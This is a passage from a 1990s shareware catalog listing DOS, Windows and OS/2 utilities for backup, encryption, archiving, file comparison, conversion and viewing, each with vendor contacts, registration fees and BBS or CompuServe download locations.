addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 12 months of + unlimited phone, mail support; bonus utilities; disks of other + shareware; discounts on upgrades; registration commissions. 1 + free update disk(s) sent out. + Look for: FSAVE11.ZIP on BBSs; FSAVE1.ZIP on CompuServe in + CIS:PCUTIL forum LIBrary 6 (or contact userID 74034,1441 for + assistance). + Download size: 100k (about eight minutes with a 2400 baud modem) + Description: + Simplifies the task of saving files on your PC. You specify + which files on your PC can be recovered from other sources + (original media, BBSs, distribution diskettes, etc.). This + need only be done once. Then FSave only backs up the files + which cannot be gotten elsewhere. This makes your periodic + filesaves small, fast and easy. No special hardware (e.g. tape + drive) is needed. I regularly back up my 170 mb disk onto a + single 1.44 floppy. + + + Product: GetBack + Author: MicroTools Inc (Robert J. Japenga), 203-651-6170 + Version: 2.4 (12-24-92) + Needs: IBM PC, DOS 2.1 or better. 640k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor; Hercules monitor; Hard disk. + Registration fee: $35.00 (add $4.00 for shipping to Canadian + addresses) (add $4.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); lifetime unlimited + phone, fax, BBS, mail support; 3-month return policy; bonus + utilities; disks of other shareware; discounts on other + products. + Look for: availability unknown on BBSs; GTBK22.ZIP on CompuServe + in CIS:PCUTIL forum LIBrary 6 (or contact userID 72077,437 for + assistance). + Download size: 350k (about 26 minutes with a 2400 baud modem) + Description: + A full featured GUI backup and restore utility (a text based + interface is also present for slower machines). Can backup up + to four megabytes per minute. Many outstanding features + including extensive online help, mouse support, file + compression, batch mode operation, point and click directory + tree selection, full, incremental and differential backups, and + multiple drive support. Formats floppies as needed or on + + Chapter 2, "Utilities" 32 + + + + demand. Supports all DOS based networks. Multiple user + configurations available. + + + Product: MegaBack Hard Disk Backup + Author: Patri-Soft (Norm Patriquin), 909-352-2820 + Version: 2.3 (04-27-93) + Needs: IBM PC, DOS 3.2 or better. 512k RAM; Hard disk. + Registration fee: $43.00 + Registration benefits: printed manual; 3 months of BBS support; + 1-month return policy; bonus utilities; discounts on upgrades. + Look for: MBACK230.ZIP on BBSs (call 909-352-2825 to download it + at no charge); MBACK.ZIP on CompuServe in CIS:PCUTIL forum + LIBrary 6 (or contact userID 76347,2477 for assistance); + MBACK23.ZIP on GEnie in IBMPC-615 forum LIBrary 5 (or contact + userID PATRISOFT for assistance). + Download size: 240k (about 18 minutes with a 2400 baud modem) + Description: + Provides painless backup. Professional features, yet easy to + use. Better than DOS 6 backup in several ways - the most + important being its storing of all backup data on one set of + sequentially numbered backup diskettes. Features: Diskette + formatting; file select/exclude; compression; spans files + across disks; multiple hard disks; appends incremental to full + backups; backup index; selective restore; menus; command line; + utilities; error recovery and more! + + + Product: No*STOP SUPRDUPE + Duplicates drive contents (remirrors). See full description on + page 9. + + Product: Open Menu + Flexible fast general purpose menu program. See full + description on page 152. + + Product: PCOPY + The copy program "that DOS forgot" See full description on + page 15. + + Product: QIC-BAT for CMS + Author: Command Line Software (Douglas East), 970-667-4566 + Version: 1.2 (11-08-93) + Needs: IBM PC, DOS 2.1 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor; Hercules monitor. Colorado Memory Systems + backup software. + Strongly recommended: Mouse. + Registration fee: $20.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, fax, BBS, + CompuServe, mail support; bonus utilities; all ASP-wide offers + + Chapter 2, "Utilities" 33 + + + + (see page 6). 12-month free upgrading allowed. Windows version + of QIC-BAT. + Look for: QICBAT12.ZIP on BBSs (call 970-663-5507 to download it + at no charge); QICBAT.ZIP on CompuServe in CIS:PCHW forum + LIBrary 17 (or contact userID 72673,357 for assistance). + SWREG#: 1067 + Download size: 260k (about 20 minutes with a 2400 baud modem) + Description: + This backup utility for Colorado tape drives unleashes the + power of your CMS tape backup software by providing access to + features not available using CMS's menu software. Creates + error-free backup batch files with just a few clicks of the + mouse. Multi-drive backups, mouse support, tag file generator, + on-line help, group drives and verification reports. + + + Product: Rosenthal UnInstall + Author: Rosenthal Engineering (Doren Rosenthal), 805-541-0910 + Version: 1.0 (04-25-94) + Needs: IBM PC, DOS 3.0 or better. 256k RAM; Hard disk. + Registration fee: $19.95 (Canadian dollars) (add $3.50 (Canadian + dollars) for shipping to U.S. addresses) (add $4.75 (Canadian + dollars) for shipping to Canadian addresses) (add $5.50 + (Canadian dollars) for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited mail support; LAN license; site license; + all ASP-wide offers (see page 6); disks of other shareware. + Look for: UNSTAL01.ZIP on BBSs (multiple files) (call + 805-528-6172 to download it at no charge). + Download size: 42k (about three minutes with a 2400 baud modem) + Description: + Automatically remove unwanted Windows & DOS programs, files, + directories and restore changes made to AUTOEXEC.BAT, + CONFIG.SYS, WIN.INI, SYSTEM.INI. Run it before you add anything + new to your system. At your option, changes can be kept, or + deleted, and the system completely returned to normal. + Safeguards provide display of all directories and files + (including hidden ones) for review and confirmation. This is an + absolute necessity for trying shareware. + + + Product: Stowaway True Archival System + Archive seldom used/inactive files to disks. See full + description on page 17. + + Product: Teleshare/DOS Remote Access + Basic DOS remote control. See full description on page 380. + + Product: WinUpD8R + Work/home file transfer/update/backup utility. See full + description on page 21. + + Chapter 2, "Utilities" 34 + + + + Product: Zip Server(TM) + PKZIP 2.04g compatible Windows utility. See full description + on page 41. + + 2.2.2 File encryption + + See also: Utilities, Security programs. + + Product: DATA PROTECTOR + Protect your data against anauthorized access. See full + description on page 164. + + Product: File Maven + DOS file manager and file transfer utility. See full + description on page 154. + + Product: Flu_Shot+ + Virus detection/prevention via active monitor. See full + description on page 161. + + Product: FreeForm + Ultimate floppy disk formatting program. See full description + on page 20. + + Product: Power Edit + Network text editor, email, file encryption. See full + description on page 363. + + Product: Puffer + Author: Kent Briggs + Version: 1.0 (05-25-95) + Needs: IBM AT (80286), Windows 3.1 or better. 2048k RAM. + Registration fee: $20.00 (add $1.00 for shipping to U.S. + addresses) (add $1.00 for shipping to Canadian addresses) (add + $3.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 3 months of unlimited CompuServe, mail + support; all ASP-wide offers (see page 6). 160-bit encryption + key enabled in registered version. + Look for: PUFF10.ZIP on BBSs; PUFF10.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 0 (or contact userID 72124,3234 for + assistance). + PsL#: 14046 + Download size: 182k (about 14 minutes with a 2400 baud modem) + Description: + A password-based data file and e-mail encryption utility for + Windows. Keep your personal, business, and electronic + transmitted data private. Uses the highly rated Blowfish + algorithm for fast, secure encryption and the Secure Hash + Algorithm (SHA) for key generation. Three output formats are + supported including binary, self-extracting executables, and + 7-bit text for Internet e-mail. Also includes a three-pass, + secure file wipe feature. + + Chapter 2, "Utilities" 35 + + + + Product: Safe Program + Author: Regnoc Software, 510-806-0713 + Version: 1.00 (07-01-95) + Needs: IBM PC, Windows 3.0 or better. 4000k RAM; VGA monitor; + Hard disk; Mouse. + Registration fee: $40.00 (add $4.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; 31/2" master disk(s); 1 months of + phone, CompuServe, mail support; 1-month limited return policy; + all ASP-wide offers (see page 6). + Look for: availability unknown on BBSs; SAFEPR.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 6 (or contact userID 73220,324 + for assistance). + SWREG#: 4936 + PsL#: 14106 + Download size: 308k (about 23 minutes with a 2400 baud modem) + Description: + Lock your files in a software safe and set the combination. + Mail the safe using any form of electronic mail. Anyone + receiving the file sees a closed safe, but can only access its + contents if they know the combinatoin. Accepts all types of + data from disk files, clipboard cut and paste, drag and drop, + OLE, etc. Visual and audio feedback in the user interface. + Windows 3.1 users may need to also install OLE 2.0 files. + + + Product: ShareMan + Software distribution tool. See full description on page 639. + + Product: Zip Pro + Full Zip/UnZip support for Windows 3.1. See full description + on page 40. + + 2.2.3 File archiving & compression + + Product: ACTION Process Automator + Triggers predetermined actions in Windows. See full + description on page 94. + + Chapter 2, "Utilities" 36 + + + + Product: ARCHIVE TRACKER + Author: Robert Barrentine Consulting, 301-490-7104 + Version: 1.0 (12-20-93) + Needs: IBM PC, DOS 3.0 or better. 275k RAM; Hard disk. + Registration fee: $35.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited tollfree 800# phone, fax, CompuServe, mail + support; 3-month return policy; discounts on upgrades. 1 free + update disk(s) sent out. + Look for: ACTR10.ZIP on BBSs; ACTR10.ZIP on CompuServe in + CIS:PCUTIL forum LIBrary 6 (or contact userID 100014,2347 for + assistance). + Download size: 271k (about 20 minutes with a 2400 baud modem) + Description: + Consists of a recommended file archiving system and the + implementing software that keeps track of the archived computer + files. Software reads archive directories and stores file data + in database that can be searched to locate specified files. + + + Product: Backer + Dir/file comparing, syncing, and backup. See full description + on page 29. + + Product: Backup Fugue + Backup and file archiving (inc networks). See full description + on page 29. + + Product: Crush + Author: PocketWare (Jeff Rollason), +44-81-203-3731 + Version: v1.3 (11-05-94) + Needs: IBM PC, DOS 2.0 or better. 80k RAM. + Registration fee: $29.00 (add $4.00 for shipping to U.S. + addresses) (add $6.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: 3 months of unlimited mail support; all + ASP-wide offers (see page 6). + Look for: CRUSH.ZIP on BBSs; CRUSH.ZIP on CompuServe in + CIS:PCUTIL forum LIBrary 5 (or contact userID 100031,3537 for + assistance); CRUSH.ZIP on GEnie in IBMPC forum LIBrary 0. + SWREG#: 2870 + PsL#: 11363 + Download size: 66k (about five minutes with a 2400 baud modem) + Description: + Super-compressor for DOS. Fed up with limited compression + performance of Stacker, PKZIP (2.04g), UC2, ZOO, ARJ and LHA? + This will usually give 5%-50% improved compression over any + other DOS compression tool, & yet allows the user to continue + using the archiver already in use. Fast & the ideal choice for + users keen to save disk space. Too good to be true? No! Try it! + PocketD v4.1 compatible. + + Chapter 2, "Utilities" 37 + + + + Product: Drag And Zip + Author: Canyon Software (Dan Baumbach), 415-382-7999 + Version: 2.41 (06-22-93) + Needs: IBM AT (80286), Windows 3.1 or better. EGA monitor. + PKZIP/PKUNZIP. + Strongly recommended: VGA monitor; Hard disk. + Registration fee: $25.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, fax, CompuServe, + mail support. 1-month return policy. 1-month free upgrading + allowed. + Look for: availability unknown on BBSs; DRAGZP.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 2 (or contact userID 74774,554 + for assistance). + Download size: 65k (about five minutes with a 2400 baud modem) + Description: + Makes any file manager that supports Drag and Drop into a Zip + file manager. Drag files to a zipper icon and run PKZIP on + them. Double click on a Zip file in file manager and a window + with the Zip file listing pops up. Tag files for extraction or + deletion. Run the associated program on a file. View the file + with the built in ASCII viewer. Drag and drop directories. + Fileman Launcher installs into File Manager and runs DZ with + it. When you quit file manager, DZ automatically quits too. + + + Product: E-report + Paperless management reports, COLD. See full description on + page 47. + + Product: File Maven + DOS file manager and file transfer utility. See full + description on page 154. + + Product: JRchive + Author: JAYAR Systems, 416-751-5678 + Version: 1.02 (11-01-93) + Needs: IBM PC, DOS 2.1 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Registration fee: $29.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, mail support; + royalty-free runtime license; bonus utilities; all ASP-wide + offers (see page 6). + Look for: JRC102.ZIP on BBSs (call 519-940-0007 to download it at + no charge). + Download size: 86k (about seven minutes with a 2400 baud modem) + Description: + Compresses files and stores them in an archive file. It has a + "concatenated archive" option that puts the files in the + archive first, then compresses it for better compression + ratios. Archives and the file extraction program may be + + Chapter 2, "Utilities" 38 + + + + distribute without royalty and you may also create royalty-free + self-extracting archives. + + + Product: PocketD Plus + Award-winning 220+ option DOS army knife. See full description + on page 156. + + Product: PUT, GET, Install Utilities + Author: MicroFox Company (Jim Hass), 216-659-9489 + Version: 3.45 (01-01-96) + Needs: IBM PC, DOS 2.0 or better. 192k RAM. + Strongly recommended: Hard disk; Mouse. + Registration fee: 19.00US$ (add 2.00US$ for shipping to U.S. + addresses) (add 3.00US$ for shipping to Canadian addresses) + (add 5.00US$ for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, BBS, CompuServe, mail support; + 1-month limited return policy; LAN license; site license; bonus + utilities; all ASP-wide offers (see page 6); disks of other + shareware; discounts on other products. 1-month free upgrading + allowed. + Look for: PUT345.ZIP on BBSs (call 216-661-9065 to download it at + no charge); PUT345.ZIP on CompuServe in CIS:PCUTIL forum + LIBrary 1 (or contact userID 73057,3113 for assistance); + PUT345.ZIP on GEnie in IBMPC forum LIBrary 0. + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + Utilites for compressing/decompressing and archiving/ + unarchiving files. Also for creating your own program + installing utility for your software packages. + + + Product: QFiler + Simple, powerful with 2 side-by-side windows. See full + description on page 157. + + Chapter 2, "Utilities" 39 + + + + Product: Rosenthal WinLite + Author: Rosenthal Engineering (Doren Rosenthal), 805-541-0910 + Version: 1.0 (10-24-93) + Needs: IBM AT (80286), Windows 3.1 or better. 256k RAM; Program + can run safely on a system with no hard disk and only one + floppy disk drive. + Strongly recommended: Hard disk. + Registration fee: $149.00 + Registration benefits: 31/2" master disk(s); 3 months of unlimited + phone, fax, CompuServe, GEnie, mail support; site license; all + ASP-wide offers (see page 6). + Look for: WINLITE1.ZIP on BBSs (multiple files) (call + 805-528-6172 to download it at no charge). + Download size: 242k (about 18 minutes with a 2400 baud modem) + Description: + Compress MS-Windows programs to dramatically reduce their size. + Programs compressed are functionally identical to the + originals, only smaller. For example, consider the 180k + "Solitaire" game that is bundled with MS-Windows 3.1. You can + compress it to less than 77k, or 43% of its original size. The + smaller, more efficient programs save disk space, LAN overhead, + disk caching resources and discourage reverse engineering. + + + Product: RPF Zip Control + Author: RPF Software (Frank B. Fortson) + Version: 2.1.5 (12-03-94) + Needs: IBM 80386, OS/2 2.1 or better. VGA monitor. OS/2 ZIP/ + UNZIP utilities. + Strongly recommended: Mouse. + Registration fee: $35.00 + Registration benefits: 3 months of unlimited fax, CompuServe, + mail support; all ASP-wide offers (see page 6). 12-month free + upgrading allowed. + Look for: ZIPCT215.ZIP on BBSs (call 703.385.4325 to download it + at no charge); ZIPCTL.ZIP on CompuServe in CIS:OS2SHARE forum + LIBrary 1 (or contact userID 71660,535 for assistance). + SWREG#: 1373 + Download size: 373k (about 28 minutes with a 2400 baud modem) + Description: + An easy-to-use 32bit PM program which shields the user from the + command line when using the OS/2 freeware ZIP.EXE & UNZIP.EXE + utilities. Users have a "point and click" view of the contents + of .ZIP files and can create new .ZIP files. + + + Product: Safe Program + Lock files in a software safe - Email secure. See full + description on page 34. + + Product: ShareMan + Software distribution tool. See full description on page 639. + + Chapter 2, "Utilities" 40 + + + + Product: SQWEZ + Author: JM Software, 609-423-1989 + Version: 1.0 (04-16-94) + Needs: IBM AT (80286), DOS 3.0 or better. 640k RAM; Program can + run safely on a system with no hard disk and only one floppy + disk drive; CGA monitor. + Strongly recommended: Hard disk. + Registration fee: $25.00 (add $1.50 for shipping to U.S. + addresses) (add $1.50 for shipping to Canadian addresses) (add + $2.50 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited CompuServe, mail support; 3-month return + policy; all ASP-wide offers (see page 6). Lifetime free + upgrading allowed. + Look for: availability unknown on BBSs; SQWZ1.EXE on CompuServe + in CIS:PCAPP forum LIBrary 7 (or contact userID 74131,1704 for + assistance). + Download size: 65k (about five minutes with a 2400 baud modem) + Description: + An easy to use multi-file compression package that outputs a + self expanding program. File overwrite and CRC data checks are + used to help assure quality data compression and decompression. + Ideal for software authors to package their program files for + distribution. + + + Product: Stowaway True Archival System + Archive seldom used/inactive files to disks. See full + description on page 17. + + Product: Universal Install + Software installation development kit. See full description on + page 414. + + Product: ViDir/ViRes File Monitor System + Monitor file usage; eliminate unused files. See full + description on page 11. + + Product: Zip Pro + Author: Synaptek Software, 905-276-8835 + Version: 1,0 (11-22-94) + Needs: IBM AT (80286), Windows 3.1 or better. 2000k RAM; CGA + monitor; XMS memory. + Strongly recommended: VGA monitor; Hard disk; Mouse; Network + (LAN). + Registration fee: $29.95 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, fax, + CompuServe, mail support; all ASP-wide offers (see page 6); + + Chapter 2, "Utilities" 41 + + + + discounts on upgrades. 6-month free upgrading allowed. 1 free + update disk(s) sent out. + Look for: ZP_ARC10.ZIP on BBSs; ZP_ARC.EXE on CompuServe in + CIS:WINSHARE forum LIBrary 2 (or contact userID 74167,722 for + assistance). + Download size: 350k (about 26 minutes with a 2400 baud modem) + Description: + With built-in Zip/UnZip, encryption, multivolume, drive windows + with tree and file views, Zip lists, Zip views and unique + interface features to simplify and animate Drag & Drop. PKZIP + not required. Fully PKZIP 2.04g compatible. Not just a shell, + this application brings real Zip functionallity to Windows and + makes it visual and simple to use. The Drag Bubble make Drag & + Drop a truly intuitive experience. + + + Product: Zip Server(TM) + Author: Redei Enterprises, 310-832-6984 + Version: 1.5 (09-30-95) + Needs: IBM 80386, Windows 3.1 or better. Hard disk; + VBRUN300.DLL. + Strongly recommended: SVGA monitor; Mouse; XMS memory; math + coprocessor. + Registration fee: $39.50 (add $5.50 for shipping to U.S. + addresses) (add $5.50 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); 3 + months of unlimited phone, fax, CompuServe, mail support; all + ASP-wide offers (see page 6). Lifetime free upgrading allowed. + Look for: availability unknown on BBSs; ZIP_SERV.E on CompuServe + in CIS:WINSHARE forum LIBrary 3 (or contact userID 71744,3633 + for assistance). + SWREG#: 5205 + PsL#: 14003 + Download size: 794k (about 59 minutes with a 2400 baud modem) + Description: + A tool for creating, updating, viewing and extracting PKZIP + 2.04g compatible archives by loading ZS as a visible + application or using it remotely and invisibly from another + Windows application. Multi volume archives. Sample code for + using with Visual Basic and with MSWord 6.0. LAN. Development + kit + DLL. + + Chapter 2, "Utilities" 42 + + + + Product: ZiPaper + Author: Daniel Thomas, 714-524-5625 + Version: 1.3c (12-30-91) + Needs: IBM PC, Windows 3.0 or better. 1024k RAM; EGA monitor; + Hercules monitor; Hard disk. PKZip/PKUnzip or LHArc. + Registration fee: $15.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited BBS, CompuServe, mail + support; bonus graphics; all ASP-wide offers (see page 6). + Look for: availability unknown on BBSs; ZIPAPR.ZIP on CompuServe + in CIS:WINFUN forum LIBrary 10 (or contact userID 72301,2164 + for assistance). + Download size: 50k (about four minutes with a 2400 baud modem) + Description: + Randomly selects .BMP files for wallpaper each time you run + Windows. Keep the .BMP files in one ZIP or LHArc file. Save + disk space! Supports tile/center and more. Support for multiple + ZIP files, manual selection of BMP file, LHArc and more. + + + 2.2.4 File comparison + + Product: Backer + Dir/file comparing, syncing, and backup. See full description + on page 29. + + Product: CSDIFF + Author: C.Sitte Softwaretechnik (Chris Sitte) + Version: 1.40 (01-25-96) + Needs: IBM PC, DOS 3.0 or better. + Registration fee: $15.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); 6 + months of CompuServe, mail support; 1-month return policy; all + ASP-wide offers (see page 6); disks of other shareware. + Look for: CSDIF140.ZIP on BBSs; CSDIFF.ZIP on CompuServe in + CIS:PCUTIL forum LIBrary 6 (or contact userID 73030,1070 for + assistance). + SWREG#: 6331 + Download size: 55k (about four minutes with a 2400 baud modem) + Description: + Displays the differences between two text files or between two + directories or ZIP archives. The two text files (or + directories) are displayed side by side. Common and different + sections are clearly marked with separator lines. Especially + useful for programmers who wants to see the differences between + two versions of a source text file or to show the differences + between two sets of files, where one or both sets can reside in + a ZIP archive. Various formatting and comparison options are + available. + + Chapter 2, "Utilities" 43 + + + + Product: PMFLCOMP + Author: American Coders, LTD. (Joseph R. McVerry), 919-846-2014 + Version: 1.61 (05-30-95) + Needs: IBM 80386, OS/2 2.0 or better. 4000k RAM; Hard disk. + Strongly recommended: CGA monitor; Hercules monitor. + Registration fee: $45.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $15.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of phone, CompuServe, mail support; 1-month return + policy; all ASP-wide offers (see page 6); disks of other + shareware. 3-month free upgrading allowed. 2 free update + disk(s) sent out. + Look for: PMFLCOMP.ZIP on BBSs; FLCOMP.ZIP on CompuServe in + CIS:OS2USER forum LIBrary 4 (or contact userID 74150,2370 for + assistance). + SWREG#: 1918 + Download size: 75k (about six minutes with a 2400 baud modem) + Description: + Compares two files using three different methods: + 1. Ascii/line: compares two files on a line by line basis. + An excellent tool for comparing differences in source + programs. + 2. Hex/binary: compares two files on a byte by byte basis. A + comprehensive listing to compare right down to the bit + level. + 3. Checksum: comparees two files by calculating a checksum + value for both files. The fastest way to compare two + files. Provides options to customize the comparison type. + + + Product: SHERLOCK + Author: Gulf Sierra, 301-460-0354 + Version: 2.73 (12-28-93) + Needs: IBM PC, DOS 2.1 or better. + Registration fee: $25.00 + Registration benefits: Master disks, phone/mail support. Bonus + utilities. Shareware disks of other programs. + Look for: SHERL273.ZIP on BBSs (call 202-547-2008 to download it + at no charge); SRL273.ZIP on CompuServe in CIS:PCUTIL forum + LIBrary 1 (or contact userID 73270,77 for assistance). + Download size: 121k (about nine minutes with a 2400 baud modem) + Description: + A text comparison utility, compares two ASCII files line by + line. Displays five lines from each file in separate windows. + You may scroll either or both files passed the mismatch to put + them in sync and continue. Either file can be automatically + scanned to locate a line matching the line selected in the + other file. Contains features for searching, ignoring case, + spaces, tabs, jumping around the files and copying lines to a + printer. This is a tool for programmers and writers. + + Chapter 2, "Utilities" 44 + + + + Product: TextPad 16 + TextPad 1.30: 16-Bit Text Editor. See full description on + page 181. + + Product: TextPad 32 + TextPad 1.30: 32-Bit Text Editor. See full description on + page 181. + + Product: WDiff + Author: C.Sitte Softwaretechnik (Chris Sitte) + Version: 1.40 (01-25-96) + Needs: IBM PC, Windows 3.0 or better. + Registration fee: $20.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 6 months of CompuServe, mail support; 1-month + return policy; bonus utilities; all ASP-wide offers (see + page 6); disks of other shareware. + Look for: WDIFF140.ZIP on BBSs; WDIFF.ZIP on CompuServe in + CIS:WINUTIL forum LIBrary 5 (or contact userID 73030,1070 for + assistance). + SWREG#: 1772 + PsL#: 11663 + Download size: 91k (about seven minutes with a 2400 baud modem) + Description: + Displays the differences between two text files or between two + directories or ZIP archives. The two text files (or + directories) are displayed side by side. Different sections are + marked with separator lines and different colors. Especially + useful to see the differences between two versions of a text + file or to show the differences between two sets of files, + where one or both sets can reside in a ZIP archive. Various + formatting and comparison options. + + + 2.2.5 File sorting & conversion + + See also: Writing applications, Writing utilities, File format + translators; Spreadsheet applications, Spreadsheet utilities, + File format translators; Database applications, Database + utilities, File format translators; Business, Business + utilities, File format translators; Graphics, Utilities, + Cataloging tools. + + Chapter 2, "Utilities" 45 + + + + Product: AsciiConvert + Author: Informatik Inc., 610.640.0339 + Version: 1.30 (12-20-95) + Needs: IBM PC, Windows 3.0 or better. VBRUN300.DLL. + Registration fee: $19.00 (add $3.50 for shipping to U.S. + addresses) (add $3.50 for shipping to Canadian addresses) (add + $3.50 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, CompuServe support; 3-month return + policy; all ASP-wide offers (see page 6); discounts on other + products; discounts on upgrades. 12-month free upgrading + allowed. + Look for: availability unknown on BBSs; ASCIIC.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 2 (or contact userID 76534,1166 + for assistance). + SWREG#: 7285 + Download size: 70k (about five minutes with a 2400 baud modem) + Description: + Restructures comma-delimited and fixed-width ASCII files so + that they can be imported to databases more easily. Functions + include field re-sequencing, new fields, constants, dates, + field concatenation/merge, remormatting, etc. + + + Product: dPerfect Merge + Author: Newdorf Research (Barbara J. Feldman), 619-793-8300 + Version: 2.0 (05-16-95) + Needs: IBM PC, DOS 2.11 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: $26.00 (add $3.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 3 months of phone, + fax, CompuServe, mail support; 3-month limited return policy; + bonus utilities; all ASP-wide offers (see page 6). + Look for: availability unknown on BBSs; DPERF.ZIP on CompuServe + in CIS:WPUSERS forum LIBrary 21 (or contact userID 73170,216 + for assistance). + SWREG#: 3319 + PsL#: 10595 + Download size: 229k (about 17 minutes with a 2400 baud modem) + Description: + Converts xBase compatible data (dBase III/IV/5, Fox, Clipper, + etc.) to Word Perfect (4.2-6.x) secondary files for mail merge + applications. Features record and field selection, and record + sorting. Allows American/European date format. Converts + European characters. Single- or multi-user. Prints summary + sheets and creates setup files to automate the conversion. + Includes data base browser, memo-field conversion and support + for latest versions of dBase and Word Perfect. + + Chapter 2, "Utilities" 46 + + + + Product: Extract It + Author: TeraByte Unlimited + Version: 1.00 (07-14-95) + Needs: IBM PC, DOS 3.0 or better. 512k RAM. + Strongly recommended: Hard disk. + Registration fee: $17.95 (add $4.00 for shipping to Canadian + addresses) (add $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited phone, fax, CompuServe, mail support; + discounts on upgrades. 1-month free upgrading allowed. + Look for: availability unknown on BBSs; EXTRIT.ZIP on CompuServe + in CIS:PCUTIL forum LIBrary 6 (or contact userID 70751,3507 for + assistance). + SWREG#: 6606 + Download size: 110k (about eight minutes with a 2400 baud modem) + Description: + A DOS-based data report extractor utility. It enables you to + extract and export selected fields from an ASCII report file to + a standard ASCII delimited file. This file can be imported to + just about any database or spreadsheet application. An + incredible value! + + + 2.2.6 File viewers + + See also: Writing applications. + + Product: Bird's-Eye-View + Author: Toham Soft + Version: 1.0 (08-15-95) + Needs: IBM AT (80286), DOS 3.3 or better. 450k RAM; VGA monitor; + Hard disk. + Registration fee: $20.00 (add $3.00 for shipping to U.S. + addresses) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 3 months of + CompuServe, mail support; 1-month limited return policy; all + ASP-wide offers (see page 6); discounts on upgrades. + Look for: availability unknown on BBSs; BIRDVU10.ZIP on + CompuServe in CIS:PCUTIL forum LIBrary 6 (or contact userID + 102065,2101 for assistance). + PsL#: 14018 + Download size: 180k (about 14 minutes with a 2400 baud modem) + Description: + An ASCII file viewer with cataloging, bookmark, screen page + navigation feature for speedy retrieval. Up to 676 files can be + cataloged in 26 folders with descriptive titles. Automatic + bookmark remembers the place you were viewing in the previous + session. Page navigation allows you to go to specific screen + page quickly. + + Chapter 2, "Utilities" 47 + + + + Product: CSDIFF + File/Directory/ZIP difference utility. See full description on + page 42. + + Product: DEXTER Text Editor + Premium quality multi-file text editor. See full description + on page 177. + + Product: Drag And View + Author: Canyon Software (Dan Baumbach), 415-382-7999 + Version: 2.0 (07-12-93) + Needs: IBM AT (80286), Windows 3.1 or better. EGA monitor; Hard + disk. Any file manager that supports drag and drop. + Strongly recommended: VGA monitor. + Registration fee: $25.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, fax, CompuServe, + mail support. 1-month return policy. 1-month free upgrading + allowed. + Look for: availability unknown on BBSs; DRAGVU.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 2 (or contact userID 74774,554 + for assistance). + Download size: 360k (about 27 minutes with a 2400 baud modem) + Awards & nominations: 1993 winner, Shareware Industry Awards. + Description: + Lets users view files in their native formats. You use it by + dragging files from Win file manager to DV's icon. It will + open up a window displaying the first file in the group in its + native format. Users can look at other files in the group by + choosing their name from the "Filelist" menu. Multiple window + viewing. Search, Goto. Formats supported: ASCII, Hex, Word, Win + Word, Write, WordPerfect, Ami Pro, xBase, Excel, Quattro, + Lotus, Paradox, BMP, ICO, PCX, GIF, TIF, ZIP, LZH. + + + Product: E-report + Author: Informatik Inc., 610.640.0339 + Version: 2.0 (06-15-95) + Needs: IBM PC, Windows 3.0 or better. VBRUN300.DLL. + Registration fee: $39.00 (add $3.50 for shipping to U.S. + addresses) (add $3.50 for shipping to Canadian addresses) (add + $3.50 for shipping outside U.S. or Canada) 